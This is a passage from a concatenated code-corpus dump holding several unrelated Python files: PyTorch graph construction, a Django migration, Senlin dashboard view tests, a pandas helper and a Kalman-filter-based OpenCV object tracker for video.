                input_node_dict[data_node.name] = data_node
            else:
                data_node._is_terminal = True
                data_node.data = params_dict[
                    ".".join(data_node.name.split(".")[1:])
                ].numpy()
                terminal_node_dict[data_node.name] = data_node
            data_node_dict[data_node.name] = data_node
        # create the iner node and the operator node
        body_nodes = list(graph.nodes())
        for i in range(0, len(body_nodes)):
            # create the operator node
            node = body_nodes[i]
            operator_node = create_operator(node)
            operator_node.set_device(self._device)
            # create the outputs node
            outputs = list(node.outputs())
            for out_node in outputs:
                data_node = DataNode(out_node)
                data_node.in_operator = operator_node
                data_node_dict[data_node.name] = data_node
                operator_node.out_data.append(data_node)
            # link the inputs node
            inputs = list(node.inputs())
            for in_node in inputs:
                in_node_name = "self." + in_node.debugName()
                data_node = data_node_dict[in_node_name]
                operator_node.in_data.append(data_node)
                data_node.out_operators.append(operator_node)
            operator_dict[str(i)] = operator_node
        # if the data node is the output, set the changeable to be false, set the is output to be true
        # (``node`` is the last traced node here, so its outputs are the graph outputs)
        outputs = list(node.outputs())
        for out_node in outputs:
            out_node_name = "self." + out_node.debugName()
            data_node = data_node_dict[out_node_name]
            data_node._changeable = False
            data_node._is_output = True
            output_node_dict[out_node_name] = data_node
        # binding the graph to node
        for key in data_node_dict.keys():
            data_node_dict[key].graph = self
        # create the module
        for key in operator_dict:
            operator = operator_dict[key]
            obj_list = operator.obj_list
            current = ""
            parent = None
            for i in range(0, len(obj_list)):
                name = obj_list[i]
                if current == "":
                    current = name
                else:
                    current = current + "." + name
                actual_obj = get_object(self._model, current)
                if current not in module_dict.keys():
                    module_dict[current] = Module()
                    module_dict[current].name = current
                    module_dict[current].graph = graph
                    module_dict[current].nn_object = actual_obj
                if parent is not None:
                    parent.sub_modules[name] = module_dict[current]
                parent = module_dict[current]
                if i == len(obj_list) - 1:
                    module_dict[current].operators.append(operator)
        # add the terminal node
        for node_name in terminal_node_dict.keys():
            node = terminal_node_dict[node_name]
            obj_names = node_name.split(".")
            if len(obj_names) == 2 and intable(obj_names[1]):
                continue
            current = "self"
            parent = None
            for i in range(1, len(obj_names)):
                name = obj_names[i]
                current = current + "." + name
                actual_obj = get_object(self._model, current)
                if current not in module_dict.keys():
                    if i == len(obj_names) - 1:
                        if not isinstance(actual_obj, (nn.Parameter, torch.Tensor)):
                            raise RuntimeError(
                                "The terminal node must be the nn.Parameter or torch.Tensor"
                            )
                    module_dict[current] = Module()
                    module_dict[current].terminal_node = node
                    module_dict[current].name = current
                    module_dict[current].graph = graph
                    module_dict[current].nn_object = actual_obj
                    module_dict[current].nn_type = type(actual_obj)
                if parent is not None:
                    parent.sub_modules[name] = module_dict[current]
                parent = module_dict[current]
        # bind the in_data and out_data for modules
        for node_name in data_node_dict.keys():
            node = data_node_dict[node_name]
            if node.is_terminal() and not node.is_input():
                continue
            if node.is_input():
                out_operators = node.out_operators
                for operator in out_operators:
                    obj_names = operator.obj_list[1:]
                    prefix = "self"
                    modules_list = _get_all_modules(module_dict, prefix, obj_names)
                    for module in modules_list:
                        if node not in module.in_data:
                            module.in_data.append(node)
                continue
            in_operator = node.in_operator
            in_scope = in_operator.obj_list
            out_operators = node.out_operators[:]
            if not node.is_output() and len(out_operators) == 0:
                module_name = _cat_names(in_operator.obj_list)
                module_dict[module_name].out_data.append(node)
                continue
            output_scope_list = []
            for out_operator in out_operators:
                output_scope_list.append(out_operator.obj_list)
            # Fix: ``is_output`` is a method; the original ``if node.is_output:``
            # tested the bound-method object, which is always truthy, so every
            # node was treated as a graph output here.
            if node.is_output():
                output_scope_list.append(["self"])
            for scope in output_scope_list:
                prefix, in_scope_names, out_scope_names = _get_common(in_scope, scope)
                in_modules_list = _get_all_modules(module_dict, prefix, in_scope_names)
                for module in in_modules_list:
                    if node not in module.out_data:
                        module.out_data.append(node)
                out_modules_list = _get_all_modules(
                    module_dict, prefix, out_scope_names
                )
                for module in out_modules_list:
                    if node not in module.in_data:
                        module.in_data.append(node)
        self.nodes = data_node_dict
        self.inputs = input_node_dict
        self.outputs = output_node_dict
        self.modules = module_dict
        self.operators = operator_dict
        # fille the data and value
        if fill_value:
            for operator in operator_dict:
                operator_dict[operator].fill_shape()
                operator_dict[operator].fill_value()
        else:
            for operator in operator_dict:
                operator_dict[operator].fill_shape()
        self.nodes = data_node_dict
        self.inputs = input_node_dict
        self.outputs = output_node_dict
        self.modules = module_dict
        self.operators = operator_dict
| StarcoderdataPython |
6413377 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-29 06:03
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
    """Add a ``metadata`` JSONField to blogmark, entry and quotation.

    NOTE(review): ``default={}`` is only used to backfill existing rows;
    ``preserve_default=False`` drops it from model state afterwards. This
    file is auto-generated — avoid editing an applied migration.
    """
    dependencies = [("blog", "0003_auto_20170926_0641")]
    operations = [
        migrations.AddField(
            model_name="blogmark",
            name="metadata",
            field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="entry",
            name="metadata",
            field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="quotation",
            name="metadata",
            field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
            preserve_default=False,
        ),
    ]
| StarcoderdataPython |
3457718 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import yaml
from django.urls import reverse
from senlin_dashboard import api
from senlin_dashboard.test import helpers as test
INDEX_URL = reverse('horizon:cluster:policies:index')
CREATE_URL = reverse('horizon:cluster:policies:create')
DETAIL_URL = reverse('horizon:cluster:policies:detail', args=[u'1'])
class PoliciesTest(test.TestCase):
    """View tests for the cluster policies panel: index listing, creation
    and detail, with the senlin API mocked out."""
    @test.create_mocks({api.senlin: ('policy_list',)})
    def test_index(self):
        """Index view renders the policy table from the mocked API list."""
        policies = self.policies.list()
        self.mock_policy_list.return_value = policies
        res = self.client.get(INDEX_URL)
        self.assertContains(res, '<h1>Policies</h1>')
        self.assertTemplateUsed(res, 'cluster/policies/index.html')
        self.assertEqual(2, len(policies))
        self.mock_policy_list.assert_called_once_with(
            test.IsHttpRequest(), filters={}, marker=None,
            paginate=True, reversed_order=False)
    @test.create_mocks({api.senlin: ('policy_list',)})
    def test_index_policy_list_exception(self):
        """An API error while listing yields an error message and empty table."""
        self.mock_policy_list.side_effect = (
            self.exceptions.senlin)
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'cluster/policies/index.html')
        self.assertEqual(0, len(res.context['policies_table'].data))
        self.assertMessageCount(res, error=1)
        self.mock_policy_list.assert_called_once_with(
            test.IsHttpRequest(), filters={}, marker=None,
            paginate=True, reversed_order=False)
    @test.create_mocks({api.senlin: ('policy_list',)})
    def test_index_no_policy(self):
        """An empty policy list renders the 'No items to display' placeholder."""
        self.mock_policy_list.return_value = []
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(res, 'cluster/policies/index.html')
        self.assertContains(res, 'No items to display')
        self.assertEqual(0, len(res.context['policies_table'].data))
        self.mock_policy_list.assert_called_once_with(
            test.IsHttpRequest(), filters={}, marker=None,
            paginate=True, reversed_order=False)
    @test.create_mocks({api.senlin: ('policy_create',)})
    def test_create_policy(self):
        """Posting a valid deletion-policy spec to the create form succeeds."""
        spec_yaml = """
type: senlin.policy.deletion
version: 1.0
description: A policy.
properties:
  criteria: OLDEST_FIRST
  destroy_after_deletion: True
  grace_period: 60
  reduce_desired_capacity: False
"""
        formdata = {
            'name': 'test-policy',
            'spec': yaml.safe_load(spec_yaml),
            'cooldown': 0,
            'level': 0
        }
        args = {
            'name': 'test-policy',
            'spec': yaml.safe_load(spec_yaml),
            'cooldown': 0,
            'level': 0
        }
        self.mock_policy_create.return_value = args
        res = self.client.post(CREATE_URL, formdata)
        self.assertNoFormErrors(res)
    @test.create_mocks({api.senlin: ('policy_get',)})
    def test_policy_detail(self):
        """Detail view fetches the policy by id and renders its name."""
        policy = self.policies.list()[0]
        self.mock_policy_get.return_value = policy
        res = self.client.get(DETAIL_URL)
        self.assertTemplateUsed(res, 'horizon/common/_detail.html')
        self.assertContains(res, 'test-policy')
        self.mock_policy_get.assert_called_once_with(
            test.IsHttpRequest(), u'1')
| StarcoderdataPython |
397878 | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 14 10:05:36 2017
@author: jel2
"""
import pandas as pd
#### this version resets the index of X in the returned table
def getSubtable(X, dictColumn='DETAILS'):
    """Expand a column of dicts into separate columns joined onto the frame.

    Resets the index of ``X`` (so the old index appears as a column), drops
    ``dictColumn``, and joins one column per dict key.

    Fix: the original hard-coded ``X.DETAILS`` in the expansion, silently
    ignoring the ``dictColumn`` parameter for any other column name.
    """
    X = X.reset_index()
    cols = list(X)
    cols.remove(dictColumn)
    return X[cols].join(pd.DataFrame.from_records(X[dictColumn].tolist(), index=X.index))
| StarcoderdataPython |
1712286 | <reponame>sieniven/spot-it-3d
import cv2
import math
import numpy as np
import time
import queue
from camera_stabilizer import stabilize_frame
from camera_stabilizer import Camera
from filterpy.kalman import KalmanFilter
from filterpy.common import Q_discrete_white_noise
from scipy.spatial import distance
from scipy.optimize import linear_sum_assignment
from automatic_brightness import average_brightness
from object_tracker import imopen
class Track:
    """Bookkeeping for one tracked object: an id, the size of its last
    detection, a Kalman filter for motion prediction, and visibility
    counters used to age-out lost tracks."""
    def __init__(self, track_id, size):
        # Unique identifier assigned by the tracker.
        self.id = track_id
        # Size of the associated detection (as supplied by the detector).
        self.size = size
        # Constant Velocity Model
        self.kalmanFilter = KalmanFilter(dim_x=4, dim_z=2)
        # # Constant Acceleration Model
        # self.kalmanFilter = KalmanFilter(dim_x=6, dim_z=2)
        # Frames since this track was created.
        self.age = 1
        # Number of frames in which a detection was matched to this track.
        self.totalVisibleCount = 1
        # Consecutive frames with no matching detection.
        self.consecutiveInvisibleCount = 0
# Returns the filled image which has the background elements filled in
def remove_ground(im_in, dilation_iterations, background_contour_circularity, frame):
    """Fill in non-circular (background) contours of a binary image.

    Dilates ``im_in`` so nearby background pixels merge into large blobs,
    classifies each resulting contour as background when its circularity is
    at or below the threshold, shows debug windows, and returns a copy of
    ``im_in`` with those contours filled with black.
    """
    dilation_kernel = np.ones((5, 5), np.uint8)
    # More iterations merge objects that are further apart into one blob.
    dilated = cv2.dilate(im_in, dilation_kernel, iterations=dilation_iterations)
    imshow_resized('dilated', dilated)
    contours, hierarchy = cv2.findContours(dilated, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    # Background is identified by the (non-)circularity of its dilated contour.
    background_contours = [
        contour for contour in contours
        if 4 * math.pi * cv2.contourArea(contour) / (cv2.arcLength(contour, True) ** 2)
        <= background_contour_circularity
    ]
    # Debug view: contours about to be removed, drawn on the colour frame.
    im_debug = frame.copy()
    cv2.drawContours(im_debug, background_contours, -1, (0, 255, 0), 3)
    imshow_resized('to_be_removed', im_debug)
    im_out = im_in.copy()
    cv2.drawContours(im_out, background_contours, -1, 0, -1)
    return im_out
def imshow_resized(window_name, img):
    """Display ``img`` scaled to a 600-pixel-wide window, keeping aspect ratio."""
    aspect_ratio = img.shape[1] / img.shape[0]
    target_size = (int(600), int(600 / aspect_ratio))
    resized = cv2.resize(img, target_size, interpolation=cv2.INTER_CUBIC)
    cv2.imshow(window_name, resized)
def downsample_image(img):
    """Return ``img`` resized to 1920 pixels wide, keeping its aspect ratio."""
    aspect_ratio = img.shape[1] / img.shape[0]
    target_size = (int(1920), int(1920 / aspect_ratio))
    return cv2.resize(img, target_size, interpolation=cv2.INTER_CUBIC)
def track_objects_realtime(filename):
    """Generator: capture frames from ``filename`` (0 = live camera),
    stabilize them, detect and track moving objects, and yield per-frame
    results.

    Yields ``(good_tracks, origin, frame_count, return_frame, frame_start)``
    once per frame. Side effects: sets the module globals FPS, FRAME_WIDTH,
    FRAME_HEIGHT and SCALE_FACTOR, shows debug windows, and writes a
    stacked frame/mask video to ``out_real-time.mp4``.
    """
    if filename == 0:
        realtime = True
        print('Start Video Capture')
    else:
        realtime = False
    cap = cv2.VideoCapture(filename)
    # These globals are read by setup_system_objects and the detectors.
    global FPS, FRAME_WIDTH, FRAME_HEIGHT, SCALE_FACTOR
    FPS = int(cap.get(cv2.CAP_PROP_FPS))
    FRAME_WIDTH = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
    FRAME_HEIGHT = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
    # Scale relative to an 848x480 reference resolution.
    SCALE_FACTOR = math.sqrt(FRAME_WIDTH ** 2 + FRAME_HEIGHT ** 2) / math.sqrt(848 ** 2 + 480 ** 2)
    aspect_ratio = FRAME_WIDTH / FRAME_HEIGHT
    downsample = False
    # Cap processing resolution at 1080p-equivalent width.
    if FRAME_WIDTH * FRAME_HEIGHT > 1920 * 1080:
        downsample = True
        FRAME_WIDTH = 1920
        FRAME_HEIGHT = int(1920 / aspect_ratio)
        SCALE_FACTOR = math.sqrt(FRAME_WIDTH ** 2 + FRAME_HEIGHT ** 2) / math.sqrt(848 ** 2 + 480 ** 2)
    # recording = cv2.VideoWriter('recording.mp4', cv2.VideoWriter_fourcc(*'h264'),
    #                             FPS, (FRAME_WIDTH, FRAME_HEIGHT))
    out_combined = cv2.VideoWriter('out_real-time.mp4', cv2.VideoWriter_fourcc(*'h264'),
                                   FPS, (FRAME_WIDTH, FRAME_HEIGHT * 2))
    camera = Camera((FRAME_WIDTH, FRAME_HEIGHT))
    fgbg, detector = setup_system_objects()
    next_id = 0
    tracks = []
    frame = None
    frame_before = None
    frame_count = 0
    fps_log = []
    frame_start = time.time()
    # Running offset accumulated from stabilization shifts.
    origin = np.array([0, 0])
    consecutive_dropped_frames = 0
    max_tolerated_consecutive_dropped_frames = 5
    while cap.isOpened():
        if realtime:
            # Estimate actual FPS from a sliding window of frame times.
            frame_end = time.time()
            frame_time = frame_end - frame_start
            if frame_time > 0.001:
                fps_log.append(frame_time)
                if len(fps_log) > 5:
                    FPS = 1 / (sum(fps_log) / len(fps_log))
                    fps_log.pop(0)
        ret, frame = cap.read()
        frame_start = time.time()
        if ret:
            print(frame_count)
            if downsample:
                frame = downsample_image(frame)
            # frame, mask = camera.undistort(frame)
            mask = np.ones((FRAME_HEIGHT, FRAME_WIDTH), dtype=np.uint8) * 255
            if frame_count == 0:
                frame_before = frame
            elif frame_count >= 1:
                # Frame stabilization
                stabilized_frame, dx, dy = stabilize_frame(frame_before, frame)
                origin[0] -= int(dx)
                origin[1] -= int(dy)
                frame_before = frame
                frame = stabilized_frame
            calibration_time = time.time()
            # centroids_f, sizes_f, masked = detect_objects(frame, mask, fgbg, detector, origin) # Detect the far & small objects
            # centroids = centroids_f
            # sizes = sizes_f
            # NOTE(review): detect_objects_large is defined elsewhere in this module.
            centroids_n, sizes_n, masked = detect_objects_large(frame, mask, fgbg, detector,
                                                                origin)  # Detect the near & big objects
            # centroids = np.append(centroids, centroids_n)
            # sizes = np.append(sizes, sizes_n)
            centroids = centroids_n
            sizes = sizes_n
            detection_time = time.time()
        else:  # Failed to read file
            if consecutive_dropped_frames >= max_tolerated_consecutive_dropped_frames:
                break
            else:
                consecutive_dropped_frames += 1
            # There is no frame, so we make do with the previous frame for visualization
            # We still want it as a 3 channel image but in gray
            frame = cv2.cvtColor(cv2.cvtColor(frame_before, cv2.COLOR_BGR2GRAY), cv2.COLOR_GRAY2BGR)
            # Empty array as the masked image
            masked = np.zeros((FRAME_HEIGHT, FRAME_WIDTH), dtype=np.uint8)
            # Empty data for detections
            centroids = np.zeros((0, 2))
            sizes = np.zeros(0)
        # Standard predict / assign / update / prune tracking cycle.
        predict_new_locations_of_tracks(tracks)
        prediction_time = time.time()
        assignments, unassigned_tracks, unassigned_detections \
            = detection_to_track_assignment(tracks, centroids, 10 * SCALE_FACTOR)
        assignment_time = time.time()
        update_assigned_tracks(assignments, tracks, centroids, sizes)
        update_unassigned_tracks(unassigned_tracks, tracks)
        tracks = delete_lost_tracks(tracks)
        next_id = create_new_tracks(unassigned_detections, next_id, tracks, centroids, sizes)
        return_frame = frame.copy()
        masked = cv2.cvtColor(masked, cv2.COLOR_GRAY2BGR)
        good_tracks = filter_tracks(frame, masked, tracks, frame_count, origin)
        other_track_stuff = time.time()
        # recording.write(return_frame)
        # Stack the annotated frame above the detection mask for the output video.
        frame_out = np.zeros((FRAME_HEIGHT * 2, FRAME_WIDTH, 3), dtype=np.uint8)
        frame_out[0:FRAME_HEIGHT, 0:FRAME_WIDTH] = frame
        frame_out[FRAME_HEIGHT:FRAME_HEIGHT * 2, 0:FRAME_WIDTH] = masked
        out_combined.write(frame_out)
        imshow_resized('frame', frame)
        imshow_resized('masked', masked)
        display_time = time.time()
        print(f"The frame took {(display_time - frame_start) * 1000}ms in total.\n"
              f"Camera stabilization took {(calibration_time - frame_start) * 1000}ms.\n"
              f"Object detection took {(detection_time - calibration_time) * 1000}ms.\n"
              f"Prediction took {(prediction_time - detection_time) * 1000}ms.\n"
              f"Assignment took {(assignment_time - prediction_time) * 1000}ms.\n"
              f"Other track stuff took {(other_track_stuff - assignment_time) * 1000}ms.\n"
              f"Writing to file took {(display_time - other_track_stuff) * 1000}ms.\n\n")
        frame_count += 1
        if not realtime:
            frame_start = False
        yield good_tracks, origin, frame_count, return_frame, frame_start
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    cap.release()
    # recording.release()
    out_combined.release()
    cv2.destroyAllWindows()
# Create VideoCapture object to extract frames from,
# background subtractor object and blob detector objects for object detection
# and VideoWriters for output videos
def setup_system_objects():
    """Create the object-detection primitives used by the tracking pipeline.

    Returns
    -------
    (fgbg, detector) : the MOG2 background subtractor and a SimpleBlobDetector.
    """
    # MOG2 subtracts the learned history model from the current frame.
    # varThreshold controls spottiness: lower values produce more, smaller
    # foreground spots (noisier, which actually helps the ground-removal step);
    # higher values merge spots into large foreground areas.
    fgbg = cv2.createBackgroundSubtractorMOG2(history=int(5 * FPS), varThreshold=16 / SCALE_FACTOR,
                                              detectShadows=False)
    # A pixel value must be present in at least this fraction of the history
    # window to be absorbed into the background model
    # (0.05 of a 5 s history = 0.25 s).
    fgbg.setBackgroundRatio(0.05)
    fgbg.setNMixtures(5)
    # Blob detector configured to accept any shape: the convexity and
    # circularity filters are both switched off.
    blob_params = cv2.SimpleBlobDetector_Params()
    blob_params.filterByConvexity = False
    blob_params.filterByCircularity = False
    detector = cv2.SimpleBlobDetector_create(blob_params)
    return fgbg, detector
# Apply image masks to prepare frame for blob detection
# Masks: 1) Increased contrast and brightness to fade out the sky and make objects stand out
# 2) Background subtractor to remove the stationary background (Converts frame to a binary image)
# 3) Further background subtraction by means of contouring around non-circular objects
# 4) Dilation to fill holes in detected drones
# 5) Inversion to make the foreground black for the blob detector to identify foreground objects
# Perform the blob detection on the masked image
# Return detected blob centroids as well as size
def detect_objects(frame, mask, fgbg, detector, origin):
    """Mask the frame and run blob detection on the result.

    Pipeline: brightness normalisation -> MOG2 background subtraction ->
    ground removal -> dilation -> inversion -> blob detection.

    Returns (centroids, sizes, masked): centroids are shifted by `origin`
    into full-frame coordinates; sizes holds the blob diameter broadcast
    into both columns of an (n, 2) array.
    """
    # convertScaleAbs computes alpha * img + beta; normalise brightness so the
    # sky fades out and foreground objects stand out.
    work = cv2.convertScaleAbs(frame, alpha=1, beta=0)
    gain = 15
    work = cv2.convertScaleAbs(work, alpha=1,
                               beta=256 - average_brightness(16, frame, mask) + gain)
    imshow_resized("pre-background subtraction", work)
    # learningRate=-1 lets OpenCV derive the update rate from the history length.
    work = fgbg.apply(work, learningRate=-1)
    imshow_resized("background subtracted", work)
    work = remove_ground(work, int(13 / (2.26 / SCALE_FACTOR)), 0.6, frame)
    # Dilation fills holes inside the detected objects.
    work = cv2.dilate(work, np.ones((5, 5), np.uint8), iterations=2)
    # The blob detector looks for dark blobs, so invert: foreground becomes black.
    work = cv2.bitwise_not(work)
    keypoints = detector.detect(work)
    centroids = np.zeros((len(keypoints), 2))
    sizes = np.zeros((len(keypoints), 2))
    for idx, keypoint in enumerate(keypoints):
        centroids[idx] = keypoint.pt
        centroids[idx] += origin
        sizes[idx] = keypoint.size
    return centroids, sizes, work
def detect_objects_large(frame, mask, fgbg, detector, origin):
    """Detect large moving objects via background subtraction and contouring.

    Unlike detect_objects(), this finds external contours instead of blobs,
    so it handles objects too big for the blob detector.

    Returns (centroids, sizes, masked): centroids are shifted by `origin`;
    sizes holds bounding-box (w, h) per contour.
    """
    masked = cv2.convertScaleAbs(frame, alpha=1, beta=0)
    gain = 15
    masked = cv2.convertScaleAbs(masked, alpha=1,
                                 beta=256 - average_brightness(16, frame, mask) + gain)
    masked = fgbg.apply(masked, learningRate=-1)
    kernel = np.ones((5, 5), np.uint8)
    # Opening removes speckle noise; dilation merges fragments of one object.
    masked = cv2.morphologyEx(masked, cv2.MORPH_OPEN, kernel, iterations=1)
    masked = cv2.dilate(masked, kernel, iterations=int(4 * SCALE_FACTOR))
    contours, hierarchy = cv2.findContours(masked, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
    centroid_list = []
    size_list = []
    for contour in contours:
        M = cv2.moments(contour)
        # Bug fix: degenerate (zero-area) contours have m00 == 0 and previously
        # raised ZeroDivisionError; skip them instead.
        if M['m00'] == 0:
            continue
        cx = int(M['m10'] / M['m00'])
        cy = int(M['m01'] / M['m00'])
        x, y, w, h = cv2.boundingRect(contour)
        centroid_list.append([cx + origin[0], cy + origin[1]])
        size_list.append([w, h])
    centroids = np.asarray(centroid_list, dtype=float).reshape(-1, 2)
    sizes = np.asarray(size_list, dtype=float).reshape(-1, 2)
    return centroids, sizes, masked
def predict_new_locations_of_tracks(tracks):
    """Advance every track's Kalman filter by one time step (prior prediction)."""
    for tr in tracks:
        tr.kalmanFilter.predict()
# Assigns detections to tracks using Munkre's Algorithm with cost based on euclidean distance,
# with detections being located too far from existing tracks being designated as unassigned detections
# and tracks without any nearby detections being designated as unassigned tracks
def detection_to_track_assignment(tracks, centroids, cost_of_non_assignment):
    """Match detections to tracks with the Hungarian algorithm.

    A square cost matrix is padded with dummy rows/columns priced at
    `cost_of_non_assignment`, so any track (or detection) whose best real
    match would cost more than that is matched to a dummy instead.

    Parameters
    ----------
    tracks : list of track objects; each exposes .kalmanFilter.x whose first
        two entries are the predicted (x, y) position.
    centroids : array-like of shape (n, 2), detection positions.
    cost_of_non_assignment : float, distance beyond which a pairing is rejected.

    Returns
    -------
    (assignments, unassigned_tracks, unassigned_detections) : arrays of
    [row, col] pairs indexing the padded cost matrix; for `assignments`,
    row is the track index and col the detection index.
    """
    m, n = len(tracks), len(centroids)
    k, l = min(m, n), max(m, n)
    # Square matrix big enough for all real pairs plus dummy padding.
    cost = np.zeros((k + l, k + l))
    # Top-left m x n corner: euclidean distance from every track to every detection.
    for i, track in enumerate(tracks):
        track_location = track.kalmanFilter.x[:2]
        cost[i, :n] = np.array([distance.euclidean(track_location, centroid)
                                for centroid in centroids])
    # Top-right corner: a real track matched to a dummy detection
    # (i.e. left unassigned) costs `cost_of_non_assignment`.
    cost[:m, n:] = np.ones((m, m)) * cost_of_non_assignment
    # Bottom-left corner: a real detection matched to a dummy track costs the same.
    cost[m:, :n] = np.ones((n, n)) * cost_of_non_assignment
    # Bottom-right corner stays 0 so surplus dummies pair with each other for free.
    row_ind, col_ind = linear_sum_assignment(cost)
    assignments_all = np.column_stack((row_ind, col_ind))
    # Real track + real detection -> valid assignment.
    assignments = assignments_all[(assignments_all < [m, n]).all(axis=1)]
    # Real track + dummy detection -> unassigned track (invisible this frame).
    unassigned_tracks = assignments_all[
        (assignments_all >= [0, n]).all(axis=1) & (assignments_all < [m, k + l]).all(axis=1)]
    # Real detection + dummy track -> unassigned detection (spawns a new track).
    unassigned_detections = assignments_all[
        (assignments_all >= [m, 0]).all(axis=1) & (assignments_all < [k + l, n]).all(axis=1)]
    return assignments, unassigned_tracks, unassigned_detections
# Using the coordinates of valid assignments which correspond to the detection and track indices,
# update the track with the matched detection
def update_assigned_tracks(assignments, tracks, centroids, sizes):
    """Correct each matched track with its detection and refresh its counters.

    Each assignment pairs a track index with a detection index; the track's
    Kalman filter is updated with the detection centroid, its size replaced,
    its age/visibility counters bumped and its invisible streak reset.
    (An experimental adaptive process-noise tweak once sketched here in
    comments has been dropped.)
    """
    for track_idx, detection_idx in assignments:
        track = tracks[track_idx]
        # Measurement update with the matched detection position.
        track.kalmanFilter.update(centroids[detection_idx])
        track.size = sizes[detection_idx]
        track.age += 1
        track.totalVisibleCount += 1
        track.consecutiveInvisibleCount = 0
# Existing tracks without a matching detection are aged and considered invisible for the frame
def update_unassigned_tracks(unassigned_tracks, tracks):
    """Age each unmatched track and extend its consecutive-invisible streak."""
    for entry in unassigned_tracks:
        track = tracks[entry[0]]
        track.age += 1
        track.consecutiveInvisibleCount += 1
# If any track has been invisible for too long, or generated by a flash, it will be removed from the list of tracks
def delete_lost_tracks(tracks):
    """Return `tracks` without lost ones.

    A track is dropped when it is young and rarely seen (likely noise from a
    flash) or when it has been invisible for too long to locate reliably.
    Thresholds scale with the global FPS.
    """
    if not tracks:
        return tracks
    invisible_for_too_long = 3 * FPS
    age_threshold = 1 * FPS

    def _is_lost(track):
        # Fraction of the track's lifetime during which it was actually seen.
        visibility = track.totalVisibleCount / track.age
        return ((track.age < age_threshold and visibility < 0.8)
                or track.consecutiveInvisibleCount >= invisible_for_too_long)

    return [track for track in tracks if not _is_lost(track)]
# Detections not assigned an existing track are given their own track, initialized with the location of the detection
def create_new_tracks(unassigned_detections, next_id, tracks, centroids, sizes):
    """Start a new constant-velocity Kalman track for every unmatched detection.

    Appends the new tracks to `tracks` in place and returns the next free id.
    """
    for unassignedDetection in unassigned_detections:
        detection_idx = unassignedDetection[1]
        centroid = centroids[detection_idx]
        size = sizes[detection_idx]
        # NOTE(review): dt is computed but never used below — the state
        # transition matrix F uses a unit time step (1) rather than 1/FPS;
        # confirm which is intended.
        dt = 1 / FPS  # Time step between measurements in seconds
        track = Track(next_id, size)
        # Attempted tuning
        # # Constant velocity model
        # # Initial Location
        # track.kalmanFilter.x = [centroid[0], centroid[1], 0, 0]
        # # State Transition Matrix
        # track.kalmanFilter.F = np.array([[1., 0, dt, 0],
        #                                  [0, 1, 0, dt],
        #                                  [0, 0, 1, 0],
        #                                  [0, 0, 0, 1]])
        # # Measurement Function
        # track.kalmanFilter.H = np.array([[1., 0, 0, 0],
        #                                  [0, 1, 0, 0]])
        # # Covariance Matrix
        # track.kalmanFilter.P = np.diag([(10.*SCALE_FACTOR)**2, (10.*SCALE_FACTOR)**2,  # Positional variance
        #                                 (7*SCALE_FACTOR)**2, (7*SCALE_FACTOR)**2])  # Velocity variance
        # # Process Noise
        # # Assumes that the process noise is white
        # track.kalmanFilter.Q = Q_discrete_white_noise(dim=4, dt=dt, var=1000)
        # # Measurement Noise
        # track.kalmanFilter.R = np.diag([10.**2, 10**2])
        # Constant velocity model
        # Initial Location: start at the detection with zero velocity.
        track.kalmanFilter.x = [centroid[0], centroid[1], 0, 0]
        # State Transition Matrix (unit time step)
        track.kalmanFilter.F = np.array([[1., 0, 1, 0],
                                         [0, 1, 0, 1],
                                         [0, 0, 1, 0],
                                         [0, 0, 0, 1]])
        # Measurement Function: only position is observed.
        track.kalmanFilter.H = np.array([[1., 0, 0, 0],
                                         [0, 1, 0, 0]])
        # Covariance Matrix — hand-tuned values; not derived from data.
        track.kalmanFilter.P = np.diag([200., 200, 50, 50])
        # Motion (process) Noise
        track.kalmanFilter.Q = np.diag([100., 100, 25, 25])
        # Measurement Noise
        track.kalmanFilter.R = 100
        # # Constant acceleration model
        tracks.append(track)
        next_id += 1
    return next_id
def filter_tracks(frame, masked, tracks, counter, origin):
    """Select mature, reliably-seen tracks and draw them onto the images.

    Both `frame` and `masked` are modified in place (rectangles + track ids).
    Returns a list of [id, age, size, (x, y)] per good track; the reported
    centroid is in full-frame coordinates (before `origin` is subtracted).
    """
    # Minimum number of frames to remove noise seems to be somewhere in the range of 30
    # Actually, I feel having both might be redundant together with the deletion criteria
    min_track_age = max(1.0 * FPS, 30)  # seconds * FPS to give number of frames in seconds
    # This has to be less than or equal to the minimum age or it make the minimum age redundant
    min_visible_count = max(1.0 * FPS, 30)
    good_tracks = []
    if len(tracks) != 0:
        for track in tracks:
            if track.age > min_track_age and track.totalVisibleCount > min_visible_count:
                centroid = track.kalmanFilter.x[:2]
                size = track.size
                good_tracks.append([track.id, track.age, size, (centroid[0], centroid[1])])
                # Shift into the cropped/display frame for drawing.
                centroid = track.kalmanFilter.x[:2] - origin
                # Display filtered tracks
                rect_top_left = (int(centroid[0] - size[0] / 2), int(centroid[1] - size[1] / 2))
                rect_bottom_right = (int(centroid[0] + size[0] / 2), int(centroid[1] + size[1] / 2))
                # Green while currently visible, red while coasting on prediction only.
                colour = (0, 255, 0) if track.consecutiveInvisibleCount == 0 else (0, 0, 255)
                thickness = 1
                cv2.rectangle(frame, rect_top_left, rect_bottom_right, colour, thickness)
                cv2.rectangle(masked, rect_top_left, rect_bottom_right, colour, thickness)
                font = cv2.FONT_HERSHEY_SIMPLEX
                font_scale = 0.5
                # Track id rendered at the box's top-right corner on both images.
                cv2.putText(frame, str(track.id), (rect_bottom_right[0], rect_top_left[1]),
                            font, font_scale, colour, thickness, cv2.LINE_AA)
